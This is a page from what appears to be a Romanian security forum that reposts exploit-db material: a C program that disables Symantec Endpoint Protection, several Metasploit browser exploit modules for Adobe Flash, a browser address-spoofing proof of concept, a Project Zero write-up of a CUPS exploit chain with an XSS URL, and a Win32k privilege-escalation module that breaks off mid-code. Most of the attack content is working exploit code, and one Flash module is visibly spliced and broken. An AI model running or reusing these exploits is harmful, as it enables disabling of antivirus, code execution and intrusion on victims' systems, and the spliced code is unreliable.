Nytro

Asta pare sa fie singura "smecherie": system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp");

OpenSSL Security Advisory [9 Jul 2015]======================================= Alternative chains certificate forgery (CVE-2015-1793) ====================================================== Severity: High During certificate verification, OpenSSL (starting from version 1.0.1n and 1.0.2b) will attempt to find an alternative certificate chain if the first attempt to build such a chain fails. An error in the implementation of this logic can mean that an attacker could cause certain checks on untrusted certificates to be bypassed, such as the CA flag, enabling them to use a valid leaf certificate to act as a CA and "issue" an invalid certificate. This issue will impact any application that verifies certificates including SSL/TLS/DTLS clients and SSL/TLS/DTLS servers using client authentication. This issue affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n and 1.0.1o. OpenSSL 1.0.2b/1.0.2c users should upgrade to 1.0.2d OpenSSL 1.0.1n/1.0.1o users should upgrade to 1.0.1p This issue was reported to OpenSSL on 24th June 2015 by Adam Langley/David Benjamin (Google/BoringSSL). The fix was developed by the BoringSSL project. Note ==== As per our previous announcements and our Release Strategy (https://www.openssl.org/about/releasestrat.html), support for OpenSSL versions 1.0.0 and 0.9.8 will cease on 31st December 2015. No security updates for these releases will be provided after that date. Users of these releases are advised to upgrade. References ========== URL for this Security Advisory: https://www.openssl.org/news/secadv_20150709.txt Note: the online version of the advisory may be updated with additional details over time. For details of OpenSSL severity classifications please see: https://www.openssl.org/about/secpolicy.html Via: https://openssl.org/news/secadv_20150709.txt

Mobile penetration testing on Android using Drozer July 8, 2015 Daniel Tomescu Mobile phones have become an indispensable part of our daily life. We use mobile phones to communicate with our loved ones, for quick access to information through the Internet, to make transactions through mobile banking apps or to relax reading a good book.In a way, a big part of our private life has moved into the digital environment. Mobile phones seem to be a pocket-sized treasure of secrets and information, hiding our most valuable photos, mails, contacts and even banking information. There’s no wonder why we need mobile phones to have bullet-proof security.Android is the most common operating system for mobile devices and is particularly interesting from the security point of view. It is very permissive, allowing its users to customize about anything, administrative privileges (a.k.a. rooting) can be unlocked on most phones, it has a very fuzzy system for the permissions required by applications and it features different ways for one application to interact with other applications.In this blog post, we are going to focus on how Android apps can interact with each other and how the security of those interactions can be tested. Articol complet: Mobile penetration testing on Android using Drozer – Security Café

[h=1]Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability[/h] # Exploit Title: Antivirus # Google Dork: intitle: Antivirus # Date: 2015-07-07 # Exploit Author: John Page ( hyp3rlinx ) # Website: hyp3rlinx.altervista.org # Vendor Homepage: www.symantec.com # Software Link: www.symantec.com/endpoint-protection # Version:12.1.4013 # Tested on: windows 7 SP1 # Category: Antivirus Vendor: ================================ Symantec ( www.symantec.com ) Product: ================================ Symantec EP 12.1.4013 Advisory Information: ================================================ Disabling Vulnerability Vulnerability Details: ===================== Symantec EP agent & services can be rendered useless even after globally locking down endpoint protection via a Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Exploit code(s): =============== #include <windows.h> #include <Tlhelp32.h> #define SMC_EXE "Smc.exe" #define SMC_GUI "SmcGui.exe" #define CC_SVC_HST "ccSvcHst.exe" /* By John Page (hyp3rlinx) - Dec 2014 - hyp3rlinx.altervista.org Symantec Endpoint Protection version 12.1.4013 First reported to Symantec - Jan 20, 2015 Goal: Kill Symantec EP agent & services after globally locking down endpoint protection via the Symantec central management server and enabling globally managed password protection controls. Tested successfully on Windows 7 SP1 result may vary OS to OS. Scenario: Run the from browser upon download or save to some directory and run Not the most elegant code and I don't care... */ void el_crookedio_crosso(const char *victimo){ HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0); PROCESSENTRY32 pEntry; pEntry.dwSize=sizeof(pEntry); BOOL hRes=Process32First(hSnapShot,&pEntry); while(hRes){ if(strcmp(pEntry.szExeFile,victimo)==0){ HANDLE hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID); if (hProcess!=NULL){ TerminateProcess(hProcess,9); CloseHandle(hProcess); } } hRes=Process32Next(hSnapShot,&pEntry); } CloseHandle(hSnapShot); } DWORD exeo_de_pid(char *ghostofsin){ DWORD ret=0; PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)}; HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hProcSnap==INVALID_HANDLE_VALUE) return 0; if (Process32First (hProcSnap,&pe32)) do if (!strcmp(pe32.szExeFile,ghostofsin)) { ret=pe32.th32ProcessID; break; } while (Process32Next (hProcSnap,&pe32)); CloseHandle (hProcSnap); return ret; } void angelo_maliciouso(){ int AV=exeo_de_pid(SMC_EXE); char id[8]; sprintf(id, "%d ", AV); printf("%s", id); char cmd[50]="Taskkill /F /PID "; strcat(cmd, id); system(cmd); // system("Taskkill /F /IM Smc.exe"); //Access denied. system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\Smc.exe\" -disable -ntp"); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); } int main(void){ puts("/*-----------------------------------------------------------*/\n"); puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013 |\n"); puts("| By hyp3rlinx - Jan 2015 |\n"); puts("/*------------------------------------------------------------*/\n"); SetDebugPrivileges(); angelo_maliciouso(); Sleep(1000); el_crookedio_crosso(SMC_EXE); el_crookedio_crosso(SMC_GUI); el_crookedio_crosso(CC_SVC_HST); Sleep(2000); angelo_maliciouso(); Sleep(6000); return 0; } int SetDebugPrivileges(){ DWORD err=0; TOKEN_PRIVILEGES Debug_Privileges; if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return GetLastError(); HANDLE hToken=0; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){ err=GetLastError(); if(hToken)CloseHandle(hToken); return err; } Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; Debug_Privileges.PrivilegeCount=1; if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){ err=GetLastError(); if(hToken) CloseHandle(hToken); } return err; } Disclosure Timeline: ========================================================= Vendor Notification: Jan 20, 2015 July 7, 2015 : Public Disclosure Severity Level: ========================================================= High Description: ================================================================== Request Method(s): [+] Click Vulnerable Product: [+] Symantec Endpoint Protection version 12.1.4013 Vulnerable Parameter(s): [+] N/A Affected Area(s): [+] Smc.exe, SmcGui.exe & ccSvcHst.exe ====================================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. (hyp3rlinx) Sursa: https://www.exploit-db.com/exploits/37525/

[h=1]Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow[/h] ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3043'], ['CVE', '2015-3113'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], ['URL', 'http://bobao.360.cn/learning/detail/357.html'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 23 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_flv header = '' header << 'FLV' # signature header << [1].pack('C') # version header << [4].pack('C') # Flags: TypeFlagsAudio header << [9].pack('N') # DataOffset data = '' data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 data << "\xee" * 0x440 # SoundData tag1 = '' tag1 << [8].pack('C') # TagType (audio) tag1 << "\x00\x04\x41" # DataSize tag1 << "\x00\x00\x1a" # TimeStamp tag1 << [0].pack('C') # TimeStampExtended tag1 << "\x00\x00\x00" # StreamID, always 0 tag1 << data body = '' body << [0].pack('N') # PreviousTagSize body << tag1 body << [0xeeeeeeee].pack('N') # PreviousTagSize flv = '' flv << header flv << body flv end end Sursa: https://www.exploit-db.com/exploits/37536/

[h=1]Adobe Flash Player ByteArray Use After Free[/h] ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player ByteArray Use After Free', 'Description' => %q{ This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows XP, Chrome 43 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Someone from HackingTeam 'juan vazquez' # msf module ], 'References' => [ ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'], ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 || os =~ OperatingSystems::Match::WINDOWS_VISTA || os =~ OperatingSystems::Match::WINDOWS_XP end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' # Note: Chrome might be vague about the version. # Instead of 18.0.0.203, it just says 18.0 return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jul 06 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Sursa: https://www.exploit-db.com/exploits/37523/

Am vazut si descrierea si video, doar ca nu am vazut ceva prea util legat de Shellter. Adica "Auto", exe si payload -> 1 minut. Restul videoclipului sunt alte lucruri, nu am vazut AV, nu am vazut scan...

Deci despre ce vrea sa fie acest videoclip? Dynamic shellcode injection? Nu am prins ideea.

https://github.com/f47h3r/hackingteam_exploits

Ideea cu site-ul e foarte ok si poate sa iasa foarte frumos, dar sa nu o dati in SF-uri...

Acum e ok?

Inca se cauta, cine e interesat imi poate da un PM.

This looks nice: EMET 5.2 - Exploit Development Community

Esti pe drumul cel bun.

Ai folosit protocoale vechi de 40 de ani ca sa spui asta. Ex. .:: Phrack Magazine ::.

Impact: The "click to verify" thing is completely broken... Anyone can be "BBB Accredited Business" etc. You can make whitehouse.gov display "We love Islamic State" Note: No user interaction on the fake page. Code: ***** index.html <script> function next() { w.location.replace('http://www.oracle.com/index.html?'+n);n++; setTimeout("next();",15); setTimeout("next();",25); } function f() { w=window.open("content.html","_blank","width=500 height=500"); i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5); } </script> <a href="#" onclick="f()">Go</a><br> ***** content.html <b>This web page is NOT oracle.com</b> <script>location="Oracle | Integrated Cloud Applications and Platform Services";</script> ***** It's online Deusen - gwhere (The page says "June/16/2015" - it works as we tested today) Request For Comment: We reported this to Google. They reproduced, and say It's DoS which doesn't matter. We think it's very strange, since the browser does not crash(not DoS), and the threat is obvious. What's your opinion? Kind Regards, PS We love clever tricks. We love this: Dieyu

Nota: Inca se cauta.

Putini tineri stiu de Phrack...

[h=1]Adobe Flash Player ShaderJob Buffer Overflow[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169. * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Evans', # Vulnerability discovery 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3090'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'], ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'May 12 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Sursa: https://www.exploit-db.com/exploits/37368/

[h=1]CUPS < 2.0.3 - Multiple Vulnerabilities[/h] Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html Abstract Modern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers. Despite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation. In this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation. By publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same. Summary Cupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code. The reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. Exploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit mitigations. Background Improper Teardown - Reference Count Over-Decrement (CVE-2015-1158) When freeing localized multi-value attributes, the reference count on the language string is over-decremented when creating a print job whose 'job-originating-host-name' attribute has more than one value. In 'add_job()', cupsd incorrectly frees the 'language' field for all strings in a group, instead of using 'ipp_free_values()'. scheduler/ipp.c:1626: /* * Free old strings… ? Even 'old' strings need to be freed. */ for (i = 0; i < attr->num_values; i ++) { _cupsStrFree(attr->values[i].string.text); attr->values[i].string.text = NULL; if (attr->values[i].string.language) ? for all values in an attribute { _cupsStrFree(attr->values[i].string.language); ? free the 'language' string attr->values[i].string.language = NULL; } } In this case, 'language' field comes from the value of the 'attributes-natural-language' attribute in the request. To specifically target a string and free it, we send a 'IPP_CREATE_JOB' or 'IPP_PRINT_JOB' request with a multi-value 'job-originating-host-name' attribute. The number of 'job-originating-host-name' values controls how many times the reference count is decremented. For a 10-value attribute, the reference count for 'language' is increased once, but decremented 10 times. The over-decrement prematurely frees the heap block for the target string. The actual block address will be quickly re-used by subsequent allocations. Dangling pointers to the block remain, but the content they point to changes when blocks are freed or reused. This is the basic exploit primitive upon which we build. A Reflected XSS in the Web Interface (CVE-2015-1159) The template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'. The template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting. The code is found in 'cgi_puts()', and escapes the following reserved HTML characters: <>"'& These are replaced with their HTML entity equivalents ('<' etc...). The function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650: if (*s == '<') { /* * Pass <A HREF="url"> and </A>, otherwise quote it... */ if (!_cups_strncasecmp(s, "<A HREF=\"", 9)) { fputs("<A HREF=\"", out); s += 9; while (*s && *s != '\"') { if (*s == '&') fputs("&", out); else putc(*s, out); s ++; } if (*s) s ++; fputs("\">", out); } For variable values containing '<a href="', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing " would normally be escaped, but are echoed unaltered in this context. Note that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue. Take this example from templates/help-header.tmp:19: <P CLASS="l0"><A HREF="/help/{QUERY??QUERY={QUERY}:}">All Documents</A></P> In this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href="', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags. Requesting the following URI will demonstrate this reflected XSS: http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search The 'QUERY' parametre is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors. Upstream Fixes Apple Fix (April 16, 2015): https://support.apple.com/kb/DL1807 Official CUPS fix for downstream vendors (June 8, 2015): https://www.cups.org/str.php?L4609 http://www.cups.org/blog.php?L1082+I0+Q Project Zero Bug For those interested, the sample exploit can be found here: https://code.google.com/p/google-security-research/issues/detail?id=455 https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37336.tar.gz Disclosure Timeline March 20th, 2015 - Initial notification to Apple April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3 June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3 June 18th, 2015 - Disclosure + 90 days June 19th, 2015 - P0 publication Attack Surface Reduction in CUPS 2.0.3+ CUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs: Configuration value strings are now logically separated from the string pool, allocated by strdup() instead. LD_* and DYLD_* environment variables are blocked when CUPS is running as root. The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only). Acknowledgements Thanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits. Conclusion No one prints anything anymore anyways. Sursa: https://www.exploit-db.com/exploits/37336/

[h=1]Windows ClientCopyImage Win32k Exploit[/h] ### This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::FileInfo include Msf::Post::Windows::ReflectiveDLLInjection def initialize(info={}) super(update_info(info, { 'Name' => 'Windows ClientCopyImage Win32k Exploit', 'Description' => %q{ This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # vulnerability discovery and exploit in the wild 'hfirefox', # Code released on github 'OJ Reeves' # msf module ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => 'win', 'SessionTypes' => [ 'metrepreter' ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ] ], 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-1701'], ['MSB', 'MS15-051'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'], ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'], ['URL', 'https://technet.microsoft.com/library/security/MS15-051'] ], 'DisclosureDate' => 'May 12 2015', 'DefaultTarget' => 0 })) end def check # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work) # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works) # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works) # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works) if sysinfo['OS'] !~ /windows/i return Exploit::CheckCode::Unknown end if sysinfo['Architecture'] =~ /(wow|x)64/i arch = ARCH_X86_64 elsif sysinfo['Architecture'] =~ /x86/i arch = ARCH_X86 end file_path = expand_path('%windir%') << '\\system32\\win32k.sys' major, minor, build, revision, branch = file_version(file_path) vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}") return Exploit::CheckCode::Safe if build == 7601 return Exploit::CheckCode::Detected end def exploit if is_system? 